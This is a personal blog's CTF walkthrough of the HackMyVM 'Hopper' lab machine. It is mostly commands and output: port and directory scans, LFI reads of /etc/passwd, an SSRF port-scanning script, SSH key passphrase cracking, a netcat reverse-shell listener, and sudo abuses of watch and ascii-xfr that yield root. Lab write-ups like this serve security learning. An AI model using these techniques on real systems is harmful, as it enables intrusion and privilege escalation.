Windy's little blog

一切生活中的杂七杂八, and I like CTF.

HackMyVm Hopper Walkthrough

HackMyVm Hopper Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Hopper

Scan ports.

 ~ nmap -sV -sC -p- 192.168.56.100  -oN ports.log                  
 Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-30 11:29 CST
 Nmap scan report for bogon (192.168.56.100)
 Host is up (0.00079s latency).
 Not shown: 65533 closed ports
 PORT   STATE SERVICE VERSION
 22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
 | ssh-hostkey:
 |   2048 fc:84:7e:5d:15:85:4d:01:d3:7b:5a:00:de:a4:73:37 (RSA)
 |   256 54:f5:ea:db:a0:38:e2:c8:5a:db:30:91:3e:78:b4:b9 (ECDSA)
 |_  256 97:b6:b8:f7:cb:15:f5:6b:cd:92:5f:66:26:28:47:07 (ED25519)
 80/tcp open  http    Apache httpd 2.4.38 ((Debian))
 |_http-server-header: Apache/2.4.38 (Debian)
 |_http-title: Site doesn't have a title (text/html).
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel


Enum port 80.

 ~ gobuster dir -u http://192.168.56.100 -t 50  -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt  -x .html,.php,.txt,.php.bak,.bak,.z[500/1872]
 403,404,500 --wildcard   -o 80.log
 ===============================================================
 /index.html           (Status: 200) [Size: 80]
 /javascript           (Status: 301) [Size: 321] [--> http://192.168.56.100/javascript/]
 /advanced-search      (Status: 301) [Size: 326] [--> http://192.168.56.100/advanced-search/]


Check /advanced-search, input anything and click "Submit", notice the url became "http://192.168.56.100/advanced-search/path.php?path=xxx". Fuzz if there is LFI.

 ~ wfuzz -u 'http://192.168.56.100/advanced-search/path.php?path=file://FUZZ' --hh 0  -w /usr/share/wordlists/seclists/Fuzzing/LFI/LFI-gracefulsecurity-linux.
 txt                                                                                                    
 =====================================================================
 ID           Response   Lines    Word       Chars       Payload
 =====================================================================
 000000005:   200        227 L    1115 W     7224 Ch     "/etc/apache2/apache2.conf"
 000000001:   200        27 L     39 W       1439 Ch     "/etc/passwd"
 000000018:   200        12 L     88 W       664 Ch      "/etc/fstab"                                    
 ...
 000000188:   200        0 L      1 W        32064 Ch    "/var/log/faillog"
 000000224:   200        1 L      4 W        1151 Ch     "/var/run/utmp"
 000000220:   200        34 L     237 W      164321 Ch   "/var/log/wtmp"
 000000199:   200        0 L      1 W        292584 Ch   "/var/log/lastlog"


Get username through passwd.

 ~ curl 'http://192.168.56.100/advanced-search/path.php?path=file:///etc/passwd'         
 root:x:0:0:root:/root:/bin/bash
 ...
 edward:x:1000:1000:edward,,,:/home/edward:/bin/bash
 systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
 henry:x:1001:1001::/home/henry:/bin/bash


Make a python script to enum local port.

 #!/usr/bin/python3
 import requests
 
 for port in range(1,65535):
     res = requests.get(f'http://192.168.56.100/advanced-search/path.php?path=http://127.0.0.1:{port}')
     if len(res.text) == 0:
         continue
     else:
         print(f'port {port} is open.')


Port 2222 is open.

 ~ python3 enum.py   
 port 22 is open.
 port 80 is open.
 port 2222 is open.


Check port 2222.

 ~ curl 'http://192.168.56.100/advanced-search/path.php?path=http%3A%2F%2F127.0.0.1%3A2222'     
 <!DOCTYPE html>
 <html>
 <body>
 
 <h1>[+] WARNING</h1>
 
 <p> - Private corporative web server</p>
 
 <p> - If you are non organization personal, leave immediately</p>
 
 
 </body>
 </html>


Fuzz dirs of port 2222.

 ~ gobuster dir -u 'http://192.168.56.100/advanced-search/path.php?path=http%3A%2F%2F127.0.0.1%3A2222'  -t 50  -w /usr/share/dirbuster/wordlists/directory-lis
 t-2.3-medium.txt   -b 401,403,404,500 --wildcard   --exclude-length 181  
 ==============================================================
 /backup               (Status: 200) [Size: 1751]
 ...


Get a id_rsa key at /backup. Chmod 600. Burteforce the key of id_rsa.

 ~ /usr/share/john/ssh2john.py id_rsa  > hash.txt  
 & kali @ mykali in ~/Documents/hopper 0 [13:03:29]
 ~ john --wordlist=/usr/share/wordlists/rock_ascii.txt  hash.txt                                         ...
 barcelona        (id_rsa)


Login ssh with user name edward.

 ~ ssh edward@192.168.56.100 -i id_rsa
 Enter passphrase for key 'id_rsa':
 Linux hopper 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64
 /usr/bin/xauth:  file /home/edward/.Xauthority does not exist
 edward@hopper:~$ id
 uid=1000(edward) gid=1000(edward) grupos=1000(edward),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)


Upload a reverse shell php and get shell as www-data.

 ~ curl http://192.168.56.100/r.php 
 ────────────────────────────────────────────────────────────────────────────────────────────────────────
 
 & kali @ mykali in ~/Documents/hopper 0 [13:07:35]
 ~ nc -nlvp 1234
 Ncat: Version 7.91 ( https://nmap.org/ncat )
 Ncat: Listening on :::1234
 Ncat: Listening on 0.0.0.0:1234
 Ncat: Connection from 192.168.56.100.
 Ncat: Connection from 192.168.56.100:35698.
 Linux hopper 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64 GNU/Linux
  07:07:50 up  1:41,  0 users,  load average: 0.01, 0.02, 0.02
 USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
 uid=33(www-data) gid=33(www-data) groups=33(www-data)
 /bin/sh: 0: can't access tty; job control turned off
 $ id
 uid=33(www-data) gid=33(www-data) groups=33(www-data)


Check sudo -l.

 www-data@hopper:/$ sudo -l
 sudo -l
 Matching Defaults entries for www-data on hopper:
     env_reset, mail_badpass,
     secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
 
 User www-data may run the following commands on hopper:
     (henry) NOPASSWD: /usr/bin/watch


Set the term environment variable, and escalate to user henry.

 www-data@hopper:/$ export TERM=xterm-256color
 export TERM=xterm-256color
 www-data@hopper:/$ sudo -u henry watch -x sh -c 'reset; exec sh 1>&0 2>&0'
 sudo -u henry watch -x sh -c 'reset; exec sh 1>&0 2>&0'
 $ id
 id
 uid=1001(henry) gid=1001(henry) groups=1001(henry)


Upload id_rsa.pub to /home/henry/.ssh/, change name to authorized_keys, and get ssh login as user henry.

 ~ ssh henry@192.168.56.100 
 Enter passphrase for key '/home/kali/.ssh/id_rsa':
 Linux hopper 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64
 /usr/bin/xauth:  file /home/henry/.Xauthority does not exist
 henry@hopper:~$ id
 uid=1001(henry) gid=1001(henry) grupos=1001(henry)


Check sudo -l.

 henry@hopper:~$ sudo -l
 Matching Defaults entries for henry on hopper:
     env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
 
 User henry may run the following commands on hopper:
     (root) NOPASSWD: /usr/bin/ascii-xfr


Use ascii-xfr to create a authorzied_keys of root.

 henry@hopper:~$ sudo ascii-xfr -rv /root/.ssh/authorized_keys < .ssh/authorized_keys 
 ASCII download of "/root/.ssh/authorized_keys"
 
 0.6 Kbytes transferred at 565 CPS... Done.


Login as root.

 ~ ssh root@192.168.56.100 
 Enter passphrase for key '/home/kali/.ssh/id_rsa':
 Linux hopper 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64
 /usr/bin/xauth:  file /root/.Xauthority does not exist
 root@hopper:~# id;hostname
 uid=0(root) gid=0(root) grupos=0(root)
 hopper




发表评论:

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

Powered By Z-BlogPHP 1.7.0